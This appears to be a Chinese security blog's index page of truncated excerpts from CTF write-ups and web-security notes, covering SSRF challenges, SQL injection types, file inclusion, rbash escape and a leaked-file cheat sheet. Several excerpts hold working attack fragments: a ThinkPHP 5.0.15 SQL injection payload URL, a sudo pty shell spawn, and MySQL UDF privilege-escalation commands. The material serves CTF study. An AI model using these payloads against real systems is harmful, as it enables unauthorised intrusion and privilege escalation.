iloveflag-blog

hash_hmachash_hmac — 使用 HMAC 方法生成带有密钥的哈希值hash_hmac(algo, data, key)当data为数组时，结果为NULL php_code1234567891011121314151617181920<?phphighlight_file();if (empty($_POST['hmac']) || empty($_POST['host'])){ header('HTTP/1.0 400 Bad Request'); exit;}...

注入：select+where注入 okupdate 注入insert 注入delete 注入 orderby 注入：if语句结合updatexml regexp 布尔型注入与时间盲注，时间盲注的脚本编写order by $name $name变量可控，如何注入单引号waf屏蔽的绕过方式 除了宽字节注入 文件包含包含木马和日志还有没有其他的情况，除了php伪协议： 包含图片马，包含日志文件，包含session文件：结合phpmyadmin，因为phpmyadmin每次登录时，会带上sessionsession.save_path，远程包含，allow_url_fopen = On al...

某位老哥发我一道web题，搜了一下是hitconctf2017的题，话说以前在i春秋上做过HITCON2017(babyfirst-revenge)的题，质量都很好dockerfile:https://github.com/Pr0phet/hitconDockerfile/tree/master/hitcon-ctf-2017/ssrfme123456789101112<?php $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); @mkdir($sandbox); @chdir(...

payload:http://127.0.0.1/thinkphp5.0.15/public/index.php/index/index/index?password[0]=inc&password[1]=updatexml(1,concat(0x7e,version()),1)&password[2]=1 source:12345678910111213//index.php<?phpnamespace app\index\controller;use think\Db;class Index{ public function ...

de1tactf2019_ssrf_me123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111#! /usr/bin/env python#encoding=utf-8from flask impo...

联合查询与order by盲注Blind SQL InjectionsAbout Blind SQL InjectionsIn a quite good production application generally you can not see error responses on the page, so you can not extract data through Union attacks or error based attacks. You have to do use Blind SQL Injections attacks to extract data. The...

快速查询整理文件泄漏.git .svn .DS_STOR vim泄漏 .index.php.swp 常见web文件泄漏： index.php~ index.phps www.zip www.tar.gz 常见危险函数strcmp：比较函数，数组绕过 extract：从用户可以控制的数组中导出变量时导致变量覆盖 parse_str：函数去变量解析存在带入未初始化的数据，可以进行url编码，变量覆盖漏洞 intval：取整函数绕过，payload:id=1024.1 ereg:%00截断 addslashes：宽字节注入%df吃掉 \ XFF：X-Forwarded-For: client...

restricted shell 与rbash什么是restricted shell？顾名思义是一个受限的shell，让用户只能执行一些网络管理员允许执行的命令，极大地控制了用户的权限，可分为rbash（The restricted mode of bash）ksh（Similarly the Korn shell’s restricted mode）rsh（The restricted mode of the Bourne shell sh）下面以rbash展开rbash是一个bash -r的软连接，可以rbash进入或者bash -r直接进入 rbash的配置在研究rbash逃逸之...

Raven11.利用python打开一个shell终端：sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’3.udf提取gcc -g -c 1518.cgcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o -lccreate table foo(line blob);insert into foo values(load_file(‘/var/www/html/1518.so’));select from foo into dumpfile ‘/usr/lib/mysql/plugin...

当前ip:172.19.16.219/24添加两个ip：ip addr add 172.19.16.220/24 dev eth0 ip addr add 172.19.16.221/24 dev eth0 在/var/ww/html/下创建web1，web2，web3目录配置/etc/httpd/conf/httpd.conf注释掉#DocumentRoot “/var/www/html”<VirtualHost 172.19.16.219:8080> ServerName web1.iloveflag.com DocumentRoot “/var/www...